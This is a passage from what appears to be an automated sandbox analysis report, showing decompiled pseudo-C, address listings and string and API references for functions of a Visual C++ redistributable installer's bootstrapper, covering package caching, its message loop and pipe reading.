											if( *(__ecx + __eax + 4) == 0) {
												goto L28;
											}
											goto L27;
										case 8:
											__eax =  &_v24;
											__esi = E000DAF54(_a8, _a20,  *(__edi + 0xc),  *(__edi + 8), 0, __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)),  *(__edi + 0x18),  *((intOrPtr*)(__edi + 0x1c)),  *((intOrPtr*)(__edi + 0x20)),  *((intOrPtr*)(__edi + 0x14)),  &_v24);
											_v20 = __esi;
											__eflags = __esi;
											if(__eflags >= 0) {
												goto L46;
											}
											_push( *((intOrPtr*)(__edi + 0x1c)));
											__eax =  *(__edi + 0xc);
											_push( *(__edi + 0x18));
											_push( *( *(__edi + 0xc)));
											_push(0);
											_push(0xe000013c);
											goto L33;
										case 9:
											__esi = E000D951C(_a8, _a12, 0,  *(__edi + 8),  *(__edi + 0xc),  *(__edi + 0x10), __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)));
											__eax =  *(__edi + 0xc);
											_v20 = __esi;
											__eflags = __esi;
											if(__eflags < 0) {
												_push(0);
												_push( *(__edi + 0x10));
												_push( *__eax);
												_push(0);
												_push(0xe0000139);
												L17:
												_push(__esi);
												__eax = E000F00CF(__edx, __eflags);
												goto L46;
											}
											__edx = _v8;
											__edx = _v8 +  *((intOrPtr*)(__eax + 0x10));
											__ecx = _v12;
											asm("adc ecx, [eax+0x14]");
											L23:
											_v8 = __edx;
											_v12 = __ecx;
											goto L48;
										case 0xa:
											__ecx =  *(__edi + 8);
											 &_v24 = _v12;
											__esi = 0;
											__eax = _v12 | 0xffffffff;
											__eflags =  *( *(__edi + 8) + 0x14);
											__eax =  !=  ? _a20 : _v12 | 0xffffffff;
											__eax = E000DAF54(_a8,  !=  ? _a20 : _v12 | 0xffffffff, 0,  *(__edi + 8),  *(__edi + 0xc), __edx,  !=  ? _a20 : _v12 | 0xffffffff,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)), 0,  *(__edi + 0x18),  *((intOrPtr*)(__edi + 0x1c)),  *((intOrPtr*)(__edi + 0x14)),  &_v24); // executed
											__esi = __eax;
											_v20 = __esi;
											__eflags = __esi;
											if(__eflags >= 0) {
												goto L46;
											}
											__eax =  *(__edi + 0xc);
											_push(0);
											_push( *(__edi + 0x18));
											_push( *( *(__edi + 0xc)));
											_push(0);
											_push(0xe000013a);
											goto L33;
										case 0xb:
											__eax =  &_v24;
											__esi = E000DAF54(_a8, _a20, 0,  *(__edi + 8),  *(__edi + 0xc), __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)),  *(__edi + 0x18),  *((intOrPtr*)(__edi + 0x1c)),  *((intOrPtr*)(__edi + 0x20)),  *((intOrPtr*)(__edi + 0x14)),  &_v24);
											_v20 = __esi;
											__eflags = __esi;
											if(__eflags >= 0) {
												L46:
												__ecx = _v12;
												L47:
												_t289 = _v8;
												goto L48;
											}
											_push( *((intOrPtr*)(__edi + 0x1c)));
											__eax =  *(__edi + 0xc);
											_push( *(__edi + 0x18));
											_push( *( *(__edi + 0xc)));
											_push(0);
											_push(0xe000013d);
											L33:
											_push(__esi);
											__eax = E000F00CF(__edx, __eflags);
											__eflags = _v24;
											__ecx = _v12;
											__edx = _v8;
											if(_v24 != 0) {
												 *(__edi + 0xc) =  *( *(__edi + 0xc));
												 *((intOrPtr*)(__edi + 0x14)) =  *((intOrPtr*)(__edi + 0x14)) + 1;
												_v36 =  *( *(__edi + 0xc));
												__eax =  *(__edi + 0x10);
												_v32 =  *(__edi + 0x10);
											}
											goto L48;
									}
								}
								__eflags = _v28 - _t245;
								if(_v28 != _t245) {
									_v8 = _v8 + E000DAC9A(_t294);
									asm("adc ecx, edx");
									_v12 = _t283;
									goto L47;
								}
								_t33 = _t294 + 4;
								 *_t33 =  *(_t294 + 4) & 0x00000000;
								__eflags =  *_t33;
								goto L9;
							}
							__eflags = _v32 - 0x80000000;
							if(__eflags == 0) {
								__eflags = _t291;
								if(_t291 == 0) {
									goto L69;
								}
								__eflags = _t296;
								if(_t296 >= 0) {
									L56:
									_t289 = 0;
									__eflags = 0;
									L57:
									_t256 =  *((intOrPtr*)(_a8 + 0x10));
									_t258 = E000BD409(_a8, 0, 2,  *((intOrPtr*)( *_t256 + 0xa8))(_t256,  *_t291, _t296, _t289));
									__eflags = _t296;
									if(_t296 >= 0) {
										L64:
										_t259 = _v56;
										L65:
										 *(_t291 + 0x78) = _t296;
										_t283 = 0x80000000;
										_t291 = 0;
										_v40 = 0x80000000;
										_v44 = 0x80000000;
										_v16 = 0;
										__eflags = _t259;
										if(_t259 == 0) {
											goto L69;
										}
										_t283 = _v12;
										_t289 = _v8;
										_v32 = 0x80000000;
										_v56 = _v56 & 0;
										_v36 = 0;
										_t244 = _v28;
										__eflags = _t244 - 0x80000000;
										_v20 = 0;
										_t245 =  ==  ? 0 : _t244;
										_t298 = _t245 * 0x28;
										__eflags = _t298;
										_v48 = _t245;
										_v52 = _t298;
										_t296 = _v20;
										goto L5;
									}
									__eflags = _t258 - 4;
									if(_t258 != 4) {
										__eflags = _t258 - 5;
										if(_t258 != 5) {
											goto L64;
										}
										__eflags =  *(_t291 + 0x1c);
										if( *(_t291 + 0x1c) != 0) {
											goto L64;
										}
										_push(_t296);
										E000B550F(2, 0xa000015e,  *_t291);
										_t302 = _t302 + 0x10;
										 *_a24 =  *_a24 + 1;
										_t263 = _v44 + 1;
										L60:
										_v28 = _t263;
										_t259 = 1;
										goto L65;
									}
									__eflags = 0;
									E000F00CF(_t289, 0, _t296, 0xa000015c, 0,  *_t291, 0, 0);
									_t263 = _v40;
									goto L60;
								}
								__eflags =  *(_t291 + 0x1c);
								if( *(_t291 + 0x1c) != 0) {
									goto L56;
								}
								_t289 = 5;
								goto L57;
							}
							E000F00CF(_t289, __eflags, _t296, 0xa000015d, 0, _v36, 0, 0);
							_t301 = _v32;
							_v8 = _v8 - E000DAC9A(_t301 * 0x28 +  *((intOrPtr*)(_t279 + 0x4c)));
							_t283 = _v12;
							_t291 = _v16;
							asm("sbb ecx, edx");
							_t289 = _v8;
							_v28 = _t301;
							goto L3;
						}
					}
				} else {
					E000B37D3(_t242, "apply.cpp", 0x1b8, _t296);
					_push("UX aborted cache.");
					_push(_t296);
					E000F012F();
					_t279 = _a16;
					L68:
					_pop(_t283);
					L69:
					if(_t296 >= 0) {
						L84:
						if(_a20 != 0xffffffff) {
							E000CCEAA(_t283, _t289, _a20);
						}
						E000C993E(_t279, _t283, _t289, _t291, _t296, 0,  *((intOrPtr*)(_t279 + 4))); // executed
						_t247 =  *(_a8 + 0x10);
						 *((intOrPtr*)( *_t247 + 0xac))(_t247, _t296);
						return _t296;
					}
					_t291 = 0;
					if( *((intOrPtr*)(_t279 + 0x58)) <= 0) {
						L83:
						 *_a28 = 1;
						goto L84;
					}
					_t252 =  *((intOrPtr*)(_t279 + 0x54));
					_t283 = _v64;
					while( *_t252 != 1 ||  *((intOrPtr*)(_t252 + 8)) != _t283) {
						_t291 = _t291 + 1;
						_t252 = _t252 + 0x28;
						if(_t291 <  *((intOrPtr*)(_t279 + 0x58))) {
							continue;
						}
						goto L83;
					}
					__eflags = _t291;
					if(_t291 == 0) {
						goto L83;
					}
					_t291 = _t291 - 1;
					__eflags = _t291;
					if(_t291 < 0) {
						goto L83;
					}
					_t300 = _a16;
					_t280 = _t291 * 0x28;
					__eflags = _t280;
					do {
						_t253 =  *((intOrPtr*)(_t300 + 0x54));
						__eflags =  *((intOrPtr*)(_t253 + _t280)) - 5;
						if( *((intOrPtr*)(_t253 + _t280)) == 5) {
							E000D9A30(_a20,  *((intOrPtr*)(_t253 + _t280 + 8)));
						}
						_t280 = _t280 - 0x28;
						_t291 = _t291 - 1;
						__eflags = _t291;
					} while (_t291 >= 0);
					_t296 = _v20;
					_t279 = _a16;
					goto L83;
				}
			}












































                                                                          0x000db2f6
                                                                          0x000db2fc
                                                                          0x000db309
                                                                          0x000db30d
                                                                          0x000db310
                                                                          0x000db313
                                                                          0x000db316
                                                                          0x000db31a
                                                                          0x000db31c
                                                                          0x000db324
                                                                          0x000db337
                                                                          0x000db339
                                                                          0x000db33e
                                                                          0x000db363
                                                                          0x000db366
                                                                          0x000db369
                                                                          0x000db36c
                                                                          0x000db36f
                                                                          0x000db36f
                                                                          0x000db36f
                                                                          0x000db372
                                                                          0x000db374
                                                                          0x000db37b
                                                                          0x000db380
                                                                          0x000db383
                                                                          0x000db386
                                                                          0x000db38b
                                                                          0x000db38e
                                                                          0x000db391
                                                                          0x000db391
                                                                          0x000db394
                                                                          0x000db397
                                                                          0x000db39a
                                                                          0x000db39d
                                                                          0x000db39d
                                                                          0x000db39d
                                                                          0x000db3a0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db3a9
                                                                          0x000db3ac
                                                                          0x000db3b0
                                                                          0x000db3b4
                                                                          0x000db3bf
                                                                          0x000db3c1
                                                                          0x000db3c2
                                                                          0x000db3c5
                                                                          0x000db75a
                                                                          0x000db75a
                                                                          0x000db75d
                                                                          0x000db760
                                                                          0x000db764
                                                                          0x000db765
                                                                          0x000db768
                                                                          0x000db76a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db76a
                                                                          0x000db3cb
                                                                          0x00000000
                                                                          0x000db3e5
                                                                          0x000db3e8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db40f
                                                                          0x000db411
                                                                          0x000db414
                                                                          0x000db416
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db41f
                                                                          0x000db422
                                                                          0x000db425
                                                                          0x000db428
                                                                          0x000db42b
                                                                          0x000db430
                                                                          0x000db433
                                                                          0x000db443
                                                                          0x000db445
                                                                          0x000db448
                                                                          0x000db44a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db450
                                                                          0x000db451
                                                                          0x000db452
                                                                          0x000db457
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db468
                                                                          0x000db46b
                                                                          0x000db46e
                                                                          0x000db471
                                                                          0x000db474
                                                                          0x000db477
                                                                          0x000db47a
                                                                          0x000db47d
                                                                          0x000db480
                                                                          0x000db483
                                                                          0x000db486
                                                                          0x000db489
                                                                          0x000db48c
                                                                          0x000db48e
                                                                          0x000db490
                                                                          0x000db491
                                                                          0x000db4a2
                                                                          0x000db4a4
                                                                          0x000db4a7
                                                                          0x000db4a9
                                                                          0x000db4bc
                                                                          0x000db4bc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db6e5
                                                                          0x000db6e8
                                                                          0x000db6ed
                                                                          0x000db6fa
                                                                          0x000db6fc
                                                                          0x000db6ff
                                                                          0x000db701
                                                                          0x000db712
                                                                          0x000db715
                                                                          0x000db717
                                                                          0x000db718
                                                                          0x000db71a
                                                                          0x000db71d
                                                                          0x000db720
                                                                          0x000db722
                                                                          0x000db724
                                                                          0x000db725
                                                                          0x000db72b
                                                                          0x000db72e
                                                                          0x000db733
                                                                          0x000db735
                                                                          0x000db738
                                                                          0x000db73b
                                                                          0x000db4c1
                                                                          0x000db4c1
                                                                          0x000db4c4
                                                                          0x00000000
                                                                          0x000db4c4
                                                                          0x000db703
                                                                          0x000db705
                                                                          0x000db706
                                                                          0x000db707
                                                                          0x000db70c
                                                                          0x000db458
                                                                          0x000db458
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db746
                                                                          0x000db74c
                                                                          0x000db74e
                                                                          0x000db85e
                                                                          0x000db867
                                                                          0x000db86d
                                                                          0x000db86f
                                                                          0x000db872
                                                                          0x000db877
                                                                          0x000db879
                                                                          0x000db887
                                                                          0x000db88a
                                                                          0x000db88f
                                                                          0x000db894
                                                                          0x000db895
                                                                          0x00000000
                                                                          0x000db895
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db4e9
                                                                          0x000db4eb
                                                                          0x000db4ee
                                                                          0x000db4f1
                                                                          0x000db4f3
                                                                          0x000db50c
                                                                          0x000db50e
                                                                          0x000db511
                                                                          0x000db513
                                                                          0x000db515
                                                                          0x00000000
                                                                          0x000db515
                                                                          0x000db4f5
                                                                          0x000db4f8
                                                                          0x000db4fb
                                                                          0x000db4fe
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db51f
                                                                          0x000db522
                                                                          0x000db527
                                                                          0x000db541
                                                                          0x000db550
                                                                          0x000db555
                                                                          0x000db557
                                                                          0x000db55a
                                                                          0x000db55c
                                                                          0x000db563
                                                                          0x000db566
                                                                          0x000db568
                                                                          0x000db56b
                                                                          0x000db56d
                                                                          0x000db56f
                                                                          0x00000000
                                                                          0x000db56f
                                                                          0x000db55e
                                                                          0x000db536
                                                                          0x000db536
                                                                          0x000db539
                                                                          0x000db53c
                                                                          0x00000000
                                                                          0x000db53c
                                                                          0x000db529
                                                                          0x000db52c
                                                                          0x000db52f
                                                                          0x000db534
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db579
                                                                          0x000db5a4
                                                                          0x000db5a6
                                                                          0x000db5a9
                                                                          0x000db5ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db5b1
                                                                          0x000db5b4
                                                                          0x000db5b7
                                                                          0x000db5ba
                                                                          0x000db5bc
                                                                          0x000db5be
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db60d
                                                                          0x000db60f
                                                                          0x000db612
                                                                          0x000db615
                                                                          0x000db617
                                                                          0x000db62a
                                                                          0x000db62c
                                                                          0x000db62f
                                                                          0x000db631
                                                                          0x000db633
                                                                          0x000db45d
                                                                          0x000db45d
                                                                          0x000db45e
                                                                          0x00000000
                                                                          0x000db45e
                                                                          0x000db619
                                                                          0x000db61c
                                                                          0x000db61f
                                                                          0x000db622
                                                                          0x000db501
                                                                          0x000db501
                                                                          0x000db504
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db63d
                                                                          0x000db647
                                                                          0x000db64a
                                                                          0x000db65e
                                                                          0x000db661
                                                                          0x000db665
                                                                          0x000db66e
                                                                          0x000db673
                                                                          0x000db675
                                                                          0x000db678
                                                                          0x000db67a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db680
                                                                          0x000db683
                                                                          0x000db685
                                                                          0x000db688
                                                                          0x000db68a
                                                                          0x000db68c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db696
                                                                          0x000db6c1
                                                                          0x000db6c3
                                                                          0x000db6c6
                                                                          0x000db6c8
                                                                          0x000db754
                                                                          0x000db754
                                                                          0x000db757
                                                                          0x000db757
                                                                          0x00000000
                                                                          0x000db757
                                                                          0x000db6ce
                                                                          0x000db6d1
                                                                          0x000db6d4
                                                                          0x000db6d7
                                                                          0x000db6d9
                                                                          0x000db6db
                                                                          0x000db5c3
                                                                          0x000db5c3
                                                                          0x000db5c4
                                                                          0x000db5c9
                                                                          0x000db5cd
                                                                          0x000db5d0
                                                                          0x000db5d3
                                                                          0x000db5dc
                                                                          0x000db5de
                                                                          0x000db5e1
                                                                          0x000db5e4
                                                                          0x000db5e7
                                                                          0x000db5e7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db3cb
                                                                          0x000db3b6
                                                                          0x000db3b9
                                                                          0x000db3d8
                                                                          0x000db3db
                                                                          0x000db3dd
                                                                          0x00000000
                                                                          0x000db3dd
                                                                          0x000db3bb
                                                                          0x000db3bb
                                                                          0x000db3bb
                                                                          0x00000000
                                                                          0x000db3bb
                                                                          0x000db770
                                                                          0x000db777
                                                                          0x000db7b2
                                                                          0x000db7b4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db7ba
                                                                          0x000db7bc
                                                                          0x000db7c9
                                                                          0x000db7c9
                                                                          0x000db7c9
                                                                          0x000db7cb
                                                                          0x000db7d2
                                                                          0x000db7e6
                                                                          0x000db7eb
                                                                          0x000db7ed
                                                                          0x000db839
                                                                          0x000db839
                                                                          0x000db83c
                                                                          0x000db83c
                                                                          0x000db83f
                                                                          0x000db844
                                                                          0x000db846
                                                                          0x000db849
                                                                          0x000db84c
                                                                          0x000db84f
                                                                          0x000db851
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db853
                                                                          0x000db856
                                                                          0x000db374
                                                                          0x000db37b
                                                                          0x000db380
                                                                          0x000db383
                                                                          0x000db386
                                                                          0x000db38b
                                                                          0x000db38e
                                                                          0x000db391
                                                                          0x000db391
                                                                          0x000db394
                                                                          0x000db397
                                                                          0x000db39a
                                                                          0x00000000
                                                                          0x000db39a
                                                                          0x000db7ef
                                                                          0x000db7f2
                                                                          0x000db811
                                                                          0x000db814
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db816
                                                                          0x000db81a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db81c
                                                                          0x000db826
                                                                          0x000db82e
                                                                          0x000db831
                                                                          0x000db836
                                                                          0x000db809
                                                                          0x000db809
                                                                          0x000db80e
                                                                          0x00000000
                                                                          0x000db80e
                                                                          0x000db7f4
                                                                          0x000db801
                                                                          0x000db806
                                                                          0x00000000
                                                                          0x000db806
                                                                          0x000db7be
                                                                          0x000db7c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db7c6
                                                                          0x00000000
                                                                          0x000db7c6
                                                                          0x000db788
                                                                          0x000db78d
                                                                          0x000db79c
                                                                          0x000db79f
                                                                          0x000db7a2
                                                                          0x000db7a5
                                                                          0x000db7a7
                                                                          0x000db7aa
                                                                          0x00000000
                                                                          0x000db7aa
                                                                          0x000db372
                                                                          0x000db340
                                                                          0x000db34b
                                                                          0x000db350
                                                                          0x000db355
                                                                          0x000db356
                                                                          0x000db35b
                                                                          0x000db89a
                                                                          0x000db89b
                                                                          0x000db89c
                                                                          0x000db89e
                                                                          0x000db8fd
                                                                          0x000db901
                                                                          0x000db906
                                                                          0x000db906
                                                                          0x000db910
                                                                          0x000db919
                                                                          0x000db91f
                                                                          0x000db92d
                                                                          0x000db92d
                                                                          0x000db8a0
                                                                          0x000db8a5
                                                                          0x000db8f4
                                                                          0x000db8f7
                                                                          0x00000000
                                                                          0x000db8f7
                                                                          0x000db8a7
                                                                          0x000db8aa
                                                                          0x000db8ad
                                                                          0x000db8b7
                                                                          0x000db8b8
                                                                          0x000db8be
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db8c0
                                                                          0x000db8c2
                                                                          0x000db8c4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db8c6
                                                                          0x000db8c6
                                                                          0x000db8c9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000db8cb
                                                                          0x000db8ce
                                                                          0x000db8ce
                                                                          0x000db8d1
                                                                          0x000db8d1
                                                                          0x000db8d4
                                                                          0x000db8d8
                                                                          0x000db8e1
                                                                          0x000db8e1
                                                                          0x000db8e6
                                                                          0x000db8e9
                                                                          0x000db8e9
                                                                          0x000db8e9
                                                                          0x000db8ee
                                                                          0x000db8f1
                                                                          0x00000000
                                                                          0x000db8f1

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ($@Met$Failed to set syncpoint event.$UX aborted cache.$apply.cpp$begin cache package$end cache package$layout bundle
                                                                          • API String ID: 0-6698178
                                                                          • Opcode ID: 73689e82dd2371dfdbd26ae6b9b8f918aea2d021cadb0489a1ed2c51759db2c8
                                                                          • Instruction ID: ba76db7c47270edf8ae13155926fd2a7d0015d24f5519aff5ada377f210c51dd
                                                                          • Opcode Fuzzy Hash: 73689e82dd2371dfdbd26ae6b9b8f918aea2d021cadb0489a1ed2c51759db2c8
                                                                          • Instruction Fuzzy Hash: 8B221571A00619FFDB15CF94C880FAEBBB6FF48710F11825AF914AB251D731A961DBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B4690 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 36%
                                                                          			E000B4690(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				void* _v8;
				struct tagMSG _v36;
				void* __ebx;
				long _t29;
				int _t33;
				intOrPtr* _t34;
				int _t37;
				intOrPtr* _t40;
				void* _t41;
				void* _t57;
				signed int _t58;
				intOrPtr* _t65;
				void* _t68;
				intOrPtr _t71;
				int _t72;
				int _t73;
				void* _t77;

				_t77 = __eflags;
				_t68 = __edx;
				_t58 = 7;
				memset( &_v36, 0, _t58 << 2);
				_v8 = 0;
				PeekMessageW( &_v36, 0, 0x400, 0x400, 0);
				_t29 = GetCurrentThreadId();
				_t71 = _a4;
				_t72 = E000CFC51( &_v8, _t68, _t77, _t71, _t29,  &_v8);
				if(_t72 >= 0) {
					_t33 = E000BD5C0(_t71 + 0xb8, _v8, _t71 + 0x1c); // executed
					_t72 = _t33;
					__eflags = _t72;
					if(_t72 >= 0) {
						_t34 =  *((intOrPtr*)(_t71 + 0xc8));
						_t73 =  *((intOrPtr*)( *_t34 + 0xc))(_t34);
						__eflags = _t73;
						if(_t73 >= 0) {
							_push(0);
							_push(0);
							_push(0);
							_t57 = GetMessageW;
							while(1) {
								_t37 = GetMessageW( &_v36, ??, ??, ??);
								__eflags = _t37;
								if(_t37 == 0) {
									break;
								}
								__eflags = _t37 - 0xffffffff;
								if(_t37 == 0xffffffff) {
									_t73 = 0x8000ffff;
									E000B37D3(_t37, "engine.cpp", 0x2cd, 0x8000ffff);
									_push("Unexpected return value from message pump.");
									goto L7;
								} else {
									E000B43CD(_t57, _t71,  &_v36); // executed
									__eflags = 0;
									_push(0);
									_push(0);
									_push(0);
									continue;
								}
								goto L13;
							}
							 *((intOrPtr*)(_t71 + 0xf8)) = _v36.wParam;
						} else {
							_push("Failed to start bootstrapper application.");
							L7:
							_push(_t73);
							E000F012F();
						}
						L13:
						_t40 =  *((intOrPtr*)(_t71 + 0xc8));
						_t41 =  *((intOrPtr*)( *_t40 + 0x10))(_t40);
						__eflags = _t41 - 0x66;
						if(_t41 != 0x66) {
							__eflags = _t41 - 0x68;
							if(_t41 == 0x68) {
								_push(0x20000006);
								_push(2);
								E000B550F();
								 *_a8 = 1;
								goto L18;
							}
						} else {
							E000B550F(2, 0x20000004, E000C3C30( *((intOrPtr*)(_t71 + 0x18)))); // executed
							 *((intOrPtr*)(_t71 + 0x18)) = 1;
						}
					} else {
						_push("Failed to load UX.");
						goto L2;
					}
				} else {
					_push("Failed to create engine for UX.");
					L2:
					_push(_t72);
					E000F012F();
					L18:
				}
				E000BD7CF(_t71 + 0xb8); // executed
				_t65 = _v8;
				if(_t65 != 0) {
					 *((intOrPtr*)( *_t65 + 8))(_t65);
				}
				return _t73;
			}




















                                                                          0x000b4690
                                                                          0x000b4690
                                                                          0x000b469b
                                                                          0x000b46a4
                                                                          0x000b46ab
                                                                          0x000b46b5
                                                                          0x000b46bb
                                                                          0x000b46c1
                                                                          0x000b46cf
                                                                          0x000b46d3
                                                                          0x000b46f3
                                                                          0x000b46f8
                                                                          0x000b46fa
                                                                          0x000b46fc
                                                                          0x000b4705
                                                                          0x000b4711
                                                                          0x000b4713
                                                                          0x000b4715
                                                                          0x000b4726
                                                                          0x000b4727
                                                                          0x000b4728
                                                                          0x000b4729
                                                                          0x000b4745
                                                                          0x000b4749
                                                                          0x000b474b
                                                                          0x000b474d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b4731
                                                                          0x000b4734
                                                                          0x000b478a
                                                                          0x000b479a
                                                                          0x000b479f
                                                                          0x00000000
                                                                          0x000b4736
                                                                          0x000b473b
                                                                          0x000b4740
                                                                          0x000b4742
                                                                          0x000b4743
                                                                          0x000b4744
                                                                          0x00000000
                                                                          0x000b4744
                                                                          0x00000000
                                                                          0x000b4734
                                                                          0x000b4752
                                                                          0x000b4717
                                                                          0x000b4717
                                                                          0x000b471c
                                                                          0x000b471c
                                                                          0x000b471d
                                                                          0x000b4723
                                                                          0x000b4758
                                                                          0x000b4758
                                                                          0x000b4761
                                                                          0x000b4764
                                                                          0x000b4767
                                                                          0x000b47a9
                                                                          0x000b47ac
                                                                          0x000b47ae
                                                                          0x000b47b3
                                                                          0x000b47b5
                                                                          0x000b47bd
                                                                          0x00000000
                                                                          0x000b47bd
                                                                          0x000b4769
                                                                          0x000b4779
                                                                          0x000b4781
                                                                          0x000b4781
                                                                          0x000b46fe
                                                                          0x000b46fe
                                                                          0x00000000
                                                                          0x000b46fe
                                                                          0x000b46d5
                                                                          0x000b46d5
                                                                          0x000b46da
                                                                          0x000b46da
                                                                          0x000b46db
                                                                          0x000b47c3
                                                                          0x000b47c4
                                                                          0x000b47cc
                                                                          0x000b47d1
                                                                          0x000b47d6
                                                                          0x000b47db
                                                                          0x000b47db
                                                                          0x000b47e6

                                                                          APIs
                                                                          • PeekMessageW.USER32 ref: 000B46B5
                                                                          • GetCurrentThreadId.KERNEL32 ref: 000B46BB
                                                                            • Part of subcall function 000CFC51: new.LIBCMT ref: 000CFC58
                                                                          • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000B4749
                                                                          Strings
                                                                          • Failed to start bootstrapper application., xrefs: 000B4717
                                                                          • Failed to load UX., xrefs: 000B46FE
                                                                          • Failed to create user for UX., xrefs: 000B46D5
                                                                          • wininet.dll, xrefs: 000B46E8
                                                                          • Unexpected return value from message pump., xrefs: 000B479F
                                                                          • user.cpp, xrefs: 000B4795
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Message$CurrentPeekThread
                                                                          • String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
                                                                          • API String ID: 673430819-2573580774
                                                                          • Opcode ID: 76c173f8752444a693e7d65175fa32be5de0fcae3bad08c1e62e4e7355528294
                                                                          • Instruction ID: b899366070e2223f8d9c317bd9457f2f65428db9fe70d800638025213abb9cf3
                                                                          • Opcode Fuzzy Hash: 76c173f8752444a693e7d65175fa32be5de0fcae3bad08c1e62e4e7355528294
                                                                          • Instruction Fuzzy Hash: 6241B171644619BFE7249BA4CC85EFEB3ACEF05314F100125FA05EB652EF20EE0597A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000C473A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 115fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E000C473A(void* _a4, signed int* _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				void* _t26;
				int _t30;
				long _t31;
				void* _t34;
				int _t35;
				signed short _t41;
				void* _t43;
				signed int _t44;
				signed int* _t48;
				signed int _t49;

				_t49 = 0;
				_v16 = _v16 & 0;
				_v12 = _v12 & 0;
				_v8 = _v8 & 0;
				_t43 = 0;
				do {
					_push(0);
					_push( &_v8);
					_t26 = 8;
					_t30 = ReadFile(_a4,  &_v16 + _t43, _t26 - _t43, ??, ??); // executed
					_t48 = _a8;
					if(_t30 != 0) {
						goto L6;
					} else {
						_t41 = GetLastError();
						if(_t41 != 0xea) {
							if(_t41 == 0x6d) {
								_t44 = 0;
								_t31 = 0;
								_v16 = 0;
								_v12 = 0;
								_t49 = 1;
								L8:
								 *_t48 = _t44;
								_t48[1] = _t31;
								if(_t31 != 0) {
									_t34 = E000B38D4(_t31, 0);
									_t48[3] = _t34;
									if(_t34 != 0) {
										_t35 = ReadFile(_a4, _t34, _t48[1],  &_v8, 0); // executed
										if(_t35 != 0) {
											_t48[2] = 1;
										} else {
											_t53 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
											_t49 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
											E000B37D3(0x80004005, "pipe.cpp", 0x327, _t49);
											_push("Failed to read data for message.");
											goto L12;
										}
									} else {
										_t49 = 0x8007000e;
										E000B37D3(_t34, "pipe.cpp", 0x323, 0x8007000e);
										_push("Failed to allocate data for message.");
										goto L12;
									}
								}
							} else {
								_t49 =  <=  ? _t41 : _t41 & 0x0000ffff | 0x80070000;
								if(_t49 < 0) {
									E000B37D3(_t41, "pipe.cpp", 0x318, _t49);
									_push("Failed to read message from pipe.");
									L12:
									_push(_t49);
									E000F012F();
